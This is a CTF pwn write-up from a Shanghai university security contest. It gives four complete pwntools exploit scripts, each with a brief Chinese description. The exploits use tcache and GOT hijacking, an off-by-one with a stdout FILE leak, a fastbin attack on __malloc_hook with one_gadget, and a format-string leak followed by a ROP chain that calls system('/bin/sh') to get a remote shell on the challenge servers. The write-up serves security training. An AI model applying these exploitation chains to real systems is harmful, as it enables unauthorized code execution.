上海大学生网络安全竞赛 pwn wp

cpu_emulator

通过越界写劫持 tcache 数组，在其 0x80 和 0x40 的位置分别填入 free 的 got 表地址和 atoi 函数的 got 表地址；申请时先将 free_got 劫持为 printf 以泄露 libc，然后将 atoi 函数的 got 表劫持为 system 函数，从而获取 shell。需要注意的是本题使用的是更新过的 2.27 libc，因此若直接劫持会 crash。
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
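context.log_level = 'debug'

# Target binary. `elf.libc` is the libc pwntools associates with it (used
# below for symbol offsets); `context.binary` makes the p*/u* helpers use the
# binary's word size and byte order.
binary = 'emulator'
elf = ELF('emulator')
libc = elf.libc
context.binary = binary

# DEBUG == 0 -> remote target, otherwise a local process.
# NOTE: DEBUG == 2 also satisfies `if DEBUG:`, so a local process is started
# first and then replaced by the ssh tube; the ssh fields are blank here.
DEBUG = 0
if DEBUG:
  p = process(binary)
  # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
  host = "123.56.52.128"
  port =  18236
  p = remote(host,port)
if DEBUG == 2:
  host = ""
  port = 0
  user = ""
  passwd = ""
  # pwntools' ssh() takes (user, host, port, password) positionally, so the
  # arguments are passed by keyword to avoid mixing them up.
  p = ssh(user=user, host=host, port=port, password=passwd)
# I/O shorthands over the tube `p`. Strings are used as byte strings
# (Python 2-style pwntools usage). l64/l32 read up to the marker byte and
# zero-extend the last 6/4 bytes into an integer; lg logs a named hex value.
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))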
def cmd(idx):
    """Choose menu option *idx* once the ">> " prompt has been received."""
    p.sendlineafter(">> ", str(idx))
def opp(payload):
    """Submit *payload* as the instruction stream via menu option 1.

    The byte length of the payload answers the size prompt; the payload
    itself is sent raw (no trailing newline) at the instruction prompt.
    """
    p.sendlineafter(">> ", "1")
    p.sendlineafter("size:\n", str(len(payload)))
    p.sendafter("instruction:\n", str(payload))
def add1(size,payload):
    """Menu option 1 with an explicit *size*, then *payload* sent raw.

    Unlike opp(), the size answered at the prompt is the caller's choice and
    need not match len(payload).
    """
    p.sendlineafter(">> ", "1")
    p.sendlineafter("size:\n", str(size))
    p.sendafter("instruction:\n", str(payload))
def add(idx,offset):
    """Encode one emulator instruction word with selector byte 0x20.

    Byte layout of the word: p16(offset), then idx, then 0x20; p16/u32 follow
    the pwntools context byte order. The "add" name is this script's own;
    the emulator's semantics for 0x20 are not shown here.
    """
    operand = p16(offset)
    selector = p8(idx) + p8(0x20)
    return u32(operand + selector)
def sub(idx,offset):
    """Encode one emulator instruction word with selector byte 0x24.

    Same layout as add(): p16(offset) + idx + 0x24, decoded with u32.
    """
    operand = p16(offset)
    selector = p8(idx) + p8(0x24)
    return u32(operand + selector)
def AND(idx,offset):
    """Encode one emulator instruction word with selector byte 0x30.

    Same layout as add(): p16(offset) + idx + 0x30, decoded with u32.
    """
    operand = p16(offset)
    selector = p8(idx) + p8(0x30)
    return u32(operand + selector)
def OR(idx,offset):
    """Encode one emulator instruction word with selector byte 0x34.

    Same layout as add(): p16(offset) + idx + 0x34, decoded with u32.
    """
    operand = p16(offset)
    selector = p8(idx) + p8(0x34)
    return u32(operand + selector)
def XOR(idx,offset):
    """Encode one emulator instruction word with selector byte 0x38.

    Same layout as add(): p16(offset) + idx + 0x38, decoded with u32.
    """
    operand = p16(offset)
    selector = p8(idx) + p8(0x38)
    return u32(operand + selector)
def SHIFT(idx,offset):
    """Encode one emulator instruction word with selector byte 0x3c.

    Same layout as add(): p16(offset) + idx + 0x3c, decoded with u32.
    """
    operand = p16(offset)
    selector = p8(idx) + p8(0x3c)
    return u32(operand + selector)
def read(idx,offset):
    """Encode one emulator instruction word with selector byte 0x8c.

    Same layout as add(): p16(offset) + idx + 0x8c, decoded with u32.
    """
    operand = p16(offset)
    selector = p8(idx) + p8(0x8c)
    return u32(operand + selector)
def write(idx,offset):
    """Encode one emulator instruction word with selector byte 0xac.

    Same layout as add(): p16(offset) + idx + 0xac, decoded with u32.
    """
    operand = p16(offset)
    selector = p8(idx) + p8(0xac)
    return u32(operand + selector)
"""
(0x3e00000 & a1) >> 21
(0x1f0000 & a1) >>16
(0xffff & a1)
"""
"""
reg[0] = 0xfffe0000
reg[0] = reg[0]+0xfdf0
reg[1] = 0x600000
reg[1] += reg[1]+0x2018
memory[reg[0]] = reg[1]
"""
# free@got in the (non-PIE) binary; 0x602018 is also the sum written in the
# pseudo-code above. Not referenced below — it appears to be kept only as a
# note of the address the instruction stream works with.
free_got = 0x0000000000602018
# Instruction stream for the emulator: every p32() is one encoded word (see
# the encoder helpers above). Per the writeup, the out-of-bounds write these
# instructions perform is what corrupts the tcache array.
payload = p32(add(0x04,0x10))+p32(add(0x05,0x20))+p32(add(0x06,0x60))
payload += p32(add(0x09,0x2))
payload += p32(SHIFT(0x00,0xffff))+p32(add(0x00,0xfe20))
payload += p32(write(0x04,0))+p32(write(0x05,1))+p32(write(0x06,2))
payload += p32(add(0x04,0x58-0x20))
payload += p32(SHIFT(0x00,0xffff))+p32(add(0x00,0xfe00))
payload += p32(write(0x04,0))+p32(write(0x05,1))+p32(write(0x06,2))
payload += p32(SHIFT(0x00,0xffff))+p32(add(0x00,0xfdb0))
payload += p32(write(0x09,2))+p32(write(0x09,6))
opp(payload)
# Reverse-engineering notes on the emulator's opcode dispatch (opcode is the
# top 6 bits of the word; jump table at 0x401404) and breakpoints used while
# debugging.
#rax = opcode >> 26
#rdx = rax*4
#eax = rdx+rax
#rdx = [0x401404+rdx]
#rax = 0x401404+[0x401404+4*(opcode >> 26)]
#0x400ECD

# b *0x400971
# b *0x400A2D
# Menu option 2, then two allocations. Per the writeup the 0x80 tcache entry
# now points at free@got, so the 0x78 request (size class 0x80) is served
# from there and its content replaces free with printf@plt. The 0x68 chunk
# only carries the format string "%9$p".
cmd(2)
add1(0x78,p64(elf.plt["printf"])*2)
add1(0x68,"%9$p")
# Option 1 presumably ends in a free() of the format-string chunk, which is
# now printf; the printed value is treated as __libc_start_main+231 to
# recover the libc base.
cmd(1)
ru("0x")
libc_base = int(p.recv(12),16)-231-libc.sym["__libc_start_main"]
lg("libc_base",libc_base)
# Still inside option 1's prompts (from cmd(1) above), so answer them
# directly: a 0x38 request (size class 0x40, which per the writeup is served
# from atoi@got) whose content is the address of system.
sla("size:\n",str(0x38))
sa("instruction:\n",p64(libc_base+libc.sym["system"]))
# add1(0x38,p64(libc_base+libc.sym["system"]))
# The menu choice goes through atoi, which is now system, so "sh" is run.
cmd("sh")


# gdb.attach(p,"""
#   b *0x400eac
# """)
p.interactive()
lgtwo

off by one，没有 show，通过劫持 stdout 泄露 libc；double free 劫持 malloc_hook，one_gadget 条件不满足，需要用 libc_realloc 调整栈帧。
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
# context.log_level = 'debug'

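# Target binary. `elf.libc` is the libc pwntools associates with it (used
# below for symbol offsets); `context.binary` makes the p*/u* helpers use the
# binary's word size and byte order.
binary = 'pwn2'
elf = ELF('pwn2')
libc = elf.libc
context.binary = binary

# DEBUG == 0 -> remote target, otherwise a local process.
# NOTE: DEBUG == 2 also satisfies `if DEBUG:`, so a local process is started
# first and then replaced by the ssh tube; the ssh fields are blank here.
DEBUG = 0
if DEBUG:
  p = process(binary)
  # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
  host = "123.56.52.128"
  port =  45830
  p = remote(host,port)
if DEBUG == 2:
  host = ""
  port = 0
  user = ""
  passwd = ""
  # pwntools' ssh() takes (user, host, port, password) positionally, so the
  # arguments are passed by keyword to avoid mixing them up.
  p = ssh(user=user, host=host, port=port, password=passwd)
# I/O shorthands over the tube `p`. Strings are used as byte strings
# (Python 2-style pwntools usage). l64/l32 read up to the marker byte and
# zero-extend the last 6/4 bytes into an integer; lg logs a named hex value.
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))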
def cmd(idx):
    """Choose menu option *idx* once the ">> " prompt has been received."""
    p.sendlineafter(">> ", str(idx))
def add(size,payload):
    """Menu option 1: allocate *size* bytes and fill them with *payload*.

    The content is sent raw (no trailing newline).
    """
    p.sendlineafter(">> ", "1")
    p.sendlineafter("size?\n", str(size))
    p.sendafter("content?\n", str(payload))
def free(idx):
    """Menu option 2: release the entry at *idx*."""
    p.sendlineafter(">> ", "2")
    p.sendlineafter("index ?\n", str(idx))
def edit(idx,payload):
    """Menu option 4: overwrite the content of entry *idx* with *payload*.

    The content is sent raw (no trailing newline).
    """
    p.sendlineafter(">> ", "4")
    p.sendlineafter("index ?\n", str(idx))
    p.sendafter("content ?\n", str(payload))
# Initial heap layout: chunks alternating between the 0x100 and 0x70 size
# classes; the trailing comment on each line is the entry index.
add(0xf8,"aaaa")#0
add(0x68,"aaaa")#1
add(0xf8,"aaaa")#2
add(0xf8,"aaaa")#3
add(0x68,"aaaa")#4
add(0xf8,"aaaa")#5
add(0x68,"aaaa")#6
# Chunk 0 is freed, then chunk 1's 0x68 bytes are written past the end: the
# p64(0x170) lands on chunk 2's prev_size (0x100 + 0x70 = chunks 0 and 1) and
# the one extra byte p8(0) — the off-by-one from the writeup — clears the low
# byte of chunk 2's size field. Freeing chunk 2 then merges it backwards over
# the still-allocated chunk 1.
free(0)
edit(1,"a"*0x60+p64(0x70+0x100)+p8(0))
free(2)
# Carve the merged region back up so that a new 0x68 chunk overlaps entry 1.
add(0xf8,"aaaa")#0
add(0x68,"aaaa")#2->1
add(0xf8,"aaaa")#7
free(0)
add(0x68,"aaaa")
add(0x68,"aaaa")#8
# 2-byte partial overwrite of a forward pointer. The top nibble is not fixed
# by the libc load address, so this presumably needs retries; per the writeup
# the target is stdout (there is no show function).
edit(8,p16(0x25dd))
free(0)
free(1)
# 1-byte partial overwrite of the freed chunk's fd, then three allocations to
# walk the list until entry 9 overlaps the redirected chunk.
edit(2,p8(0x70))
add(0x68,"aaa")#0
add(0x68,"aaa")#1
add(0x68,"aaa")#9
# Overwrite the stdout FILE structure: flags 0xfbad1887, three NULL pointers
# and the low byte of the next pointer, so the next output leaks libc
# pointers; the leaked value is treated as the address of _IO_2_1_stdin_.
edit(9,"a"*0x33+p64(0xfbad1887)+p64(0)*3+p8(0x88))
libc_base = l64()-libc.sym["_IO_2_1_stdin_"]
lg("libc_base",libc_base)
# Double free (writeup), then redirect the list at __malloc_hook-0x23, whose
# 0x7f byte serves as a plausible 0x70-class size field.
free(4)
free(0)
edit(2,p64(libc_base+libc.sym["__malloc_hook"]-0x23))
add(0x68,"aaaa")
add(0x68,"aaaa")
"""
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf0364 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1207 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
"""
# Entry 4 now sits at __malloc_hook-0x13 (data view). 0xb bytes of padding
# then the 0x4527a gadget, then __libc_realloc+8: per the writeup the gadget's
# stack constraint does not hold directly, so malloc goes through realloc
# first (the gadget presumably ends up in __realloc_hook, which precedes
# __malloc_hook in libc — confirm against the libc layout).
edit(4,"a"*(0x13-0x8)+p64(libc_base+0x4527a)+p64(libc_base+libc.sym["__libc_realloc"]+0x8))
# Any allocation now triggers the hook chain; the prompt text is consumed
# with a plain recv() instead of sendlineafter.
cmd(1)
p.recv()
p.sendline(str(0x100))
# gdb.attach(p)
p.interactive()
maj0rone

exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: cnitlrt
import sys
import os
from pwn import *
# context.lo1
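context.log_level = 'debug'

# Target binary. `elf.libc` is the libc pwntools associates with it (used
# below for symbol offsets); `context.binary` makes the p*/u* helpers use the
# binary's word size and byte order.
binary = 'maj'
elf = ELF('maj')
libc = elf.libc
context.binary = binary

# DEBUG == 0 -> remote target, otherwise a local process.
# NOTE: DEBUG == 2 also satisfies `if DEBUG:`, so a local process is started
# first and then replaced by the ssh tube; the ssh fields are blank here.
DEBUG = 0
if DEBUG:
  p = process(binary)
  # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
  host = "123.56.52.128"
  port =  18523
  p = remote(host,port)
if DEBUG == 2:
  host = ""
  port = 0
  user = ""
  passwd = ""
  # pwntools' ssh() takes (user, host, port, password) positionally, so the
  # arguments are passed by keyword to avoid mixing them up.
  p = ssh(user=user, host=host, port=port, password=passwd)
# Libc-relative offsets used below: o_g are one_gadget candidates (only
# o_g[3] is used), magic are malloc/free/realloc/system per the inline
# comment (magic is not referenced later in the script).
o_g = [0x45226,0x4527a,0xf0364,0xf1207]
magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system
# I/O shorthands over the tube `p`. Strings are used as byte strings
# (Python 2-style pwntools usage). l64/l32 read up to the marker byte and
# zero-extend the last 6/4 bytes into an integer; lg logs a named hex value.
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))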
def cmd(idx):
    """Choose menu option *idx* once the ">> " prompt has been received."""
    p.sendlineafter(">> ", str(idx))
def add(size,payload):
    """Menu option 1: answer the challenge question with 80, request *size*
    bytes, then send *payload* raw at the content prompt."""
    p.sendlineafter(">> ", "1")
    p.sendlineafter('please answer the question\n', "80")
    p.sendlineafter("______?\n", str(size))
    p.sendafter("yes_or_no?\n", str(payload))
def free(idx):
    """Menu option 2: release the entry at *idx*."""
    p.sendlineafter(">> ", "2")
    p.sendlineafter("index ?\n", str(idx))
def show(idx):
    """Menu option 3: display the entry at *idx* (unused by this script)."""
    p.sendlineafter(">> ", "3")
    p.sendlineafter("index ?\n", str(idx))
def edit(idx,payload):
    """Menu option 4: overwrite the content of entry *idx* with *payload*.

    The content is sent raw (no trailing newline).
    """
    p.sendlineafter(">> ", "4")
    p.sendlineafter("index ?\n", str(idx))
    p.sendafter("__new_content ?\n", str(payload))
# Initial layout: one 0x30-class chunk (entry 0) followed by four 0x70-class
# chunks (entries 1-4).
add(0x28,"0")
add(0x68,"0")
add(0x68,'0')
add(0x68,'0')
add(0x68,'0')
# Entry 0 gets a fake chunk header (size 0x71) and entry 1 is filled with
# repeated fake 0x21 headers, so later size checks see plausible chunks.
edit(0,p64(0)+p64(0x71))
payload = p64(0)+p64(0x21)
edit(1,payload*6)
# Free two 0x70-class chunks, then overwrite the low byte of the freed
# chunk's fd ('\x10') to redirect the list; entry 6 then overlaps an
# existing chunk.
free(2)
free(1)
edit(1,'\x10')
add(0x68,"1")
add(0x68,"1")#6
# Through the overlap, write a size field of 0xe1 (0x70 + 0x71) so two
# 0x70-class chunks look like one larger chunk; repeated to re-use the
# overlap after each free/allocate cycle.
payload = p64(0)*3+p64(0x70+0x71)
edit(6,payload)
free(1)
add(0x68,"a")#7
add(0x68,"a")#8->2
edit(6,payload)
free(1)
free(2)
add(0x38,"a")#9
add(0x28,"a")#10
# 2-byte partial overwrite of a forward pointer; the top nibble is not fixed
# by the libc load address, so this presumably needs retries. The following
# allocations land on the redirected chunk (entry 12).
edit(8,p16(0x25dd))
add(0x68,"a")
add(0x68,"12")
# Overwrite a FILE structure: flags 0xfbad1887, three NULL pointers and a
# zero low byte of the next pointer, so the next output leaks a libc
# pointer. 0x3c5600 is a hard-coded offset of that pointer in this libc.
edit(12,"a"*0x33+p64(0xfbad1887)+p64(0)*3+p8(0))
libc_base = l64()-0x3c5600
lg("libc_base",libc_base)
# Free entry 3 and rewrite its fd to __malloc_hook-0x23 (whose 0x7f byte
# serves as a plausible 0x70-class size); two allocations later entry 14
# sits just before __malloc_hook.
free(3)
edit(3,p64(libc_base+libc.sym["__malloc_hook"]-0x23))
add(0x68,"a")
add(0x68,"14")
# 0x13 bytes of padding put the one_gadget address (o_g[3]) on __malloc_hook.
edit(14,"a"*0x13+p64(o_g[3]+libc_base))
# Any allocation now invokes the hook: go through option 1's prompts by hand.
cmd(1)
sla('please answer the question\n',str(80))
sla("______?\n",str(80))
# gdb.attach(p)
p.interactive()
EASY_ABNORMAL

exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
#context.log_level = 'debug'

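# Target binary. `elf.libc` is the libc pwntools associates with it (used
# below for symbol offsets and the "/bin/sh" search); `context.binary` makes
# the p*/u* helpers use the binary's word size and byte order.
binary = 'pwn111'
elf = ELF('pwn111')
libc = elf.libc
context.binary = binary

# DEBUG == 0 -> remote target, otherwise a local process.
# NOTE: DEBUG == 2 also satisfies `if DEBUG:`, so a local process is started
# first and then replaced by the ssh tube; the ssh fields are blank here.
DEBUG = 0
if DEBUG:
  p = process(binary)
  # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
  host = "123.56.52.128"
  port =  10012
  p = remote(host,port)
if DEBUG == 2:
  host = ""
  port = 0
  user = ""
  passwd = ""
  # pwntools' ssh() takes (user, host, port, password) positionally, so the
  # arguments are passed by keyword to avoid mixing them up.
  p = ssh(user=user, host=host, port=port, password=passwd)
# I/O shorthands over the tube `p`. Strings are used as byte strings
# (Python 2-style pwntools usage; note `.next()` later in the script).
# l64/l32 read up to the marker byte and zero-extend the last 6/4 bytes into
# an integer; lg logs a named hex value.
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))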
def cmd(idx):
    """Choose menu option *idx* once the "E :" prompt has been received."""
    p.sendlineafter("E :", str(idx))
def add(payload):
    """Menu option 2: store *payload* (sent with a trailing newline)."""
    p.sendlineafter("E :", "2")
    p.sendlineafter("cnt:\n", str(payload))
def free(idx):
    """Menu option 3: release the entry at *idx*."""
    p.sendlineafter("E :", "3")
    p.sendlineafter("idx:", str(idx))
def show(idx):
    """Menu option 4. *idx* is accepted but never sent: the listing apparently
    prints every entry (the caller reads up to the "2:" marker)."""
    p.sendlineafter("E :", "4")
def gift(payload):
    """Hidden menu option 23333: send *payload* raw at the "INPUT:" prompt."""
    p.sendlineafter("E :", "23333")
    p.sendafter("INPUT:", str(payload))
# The name field is printed back through a format function: "%11$p" dumps
# the 11th stack argument, which is treated as __libc_start_main+240.
sla("NAME: ","%11$p")
cmd(1)
ru("0x")
libc_base = int(p.recv(12),16)-240-libc.sym["__libc_start_main"]
lg("libc_base",libc_base)
# Libc-relative gadgets: pop rdi; ret and a bare ret (offsets hard-coded for
# this libc); system and a "/bin/sh" string come from the symbol table.
pop_rdi = libc_base + 0x21112
sys_addr = libc_base + libc.sym['system']
sh_addr = libc_base + libc.search("/bin/sh").next()
ret = libc_base + 0x0937
# ROP chain: six ret slides for alignment, then system("/bin/sh"). Stored
# twice on the heap via option 2.
payload = p64(ret)*6+p64(pop_rdi)+p64(sh_addr)+p64(sys_addr)
add(payload)
add(payload)
# Free both entries, then list them: the second entry now starts with a heap
# pointer (its freelist link), which the listing prints after "2:".
free(0)
free(1)
show(1)
ru("2:")
heap_base = u64(ru("\n")[:-1].ljust(8,"\x00"))
lg("heap_base",heap_base)

# gdb.attach(p)
# Hidden option: 0x20 bytes of filler followed by a pointer to heap_base+0x20,
# presumably where the stored chain begins — confirm against the heap layout.
gift("a"*0x20+p64(heap_base+0x20))
p.interactive()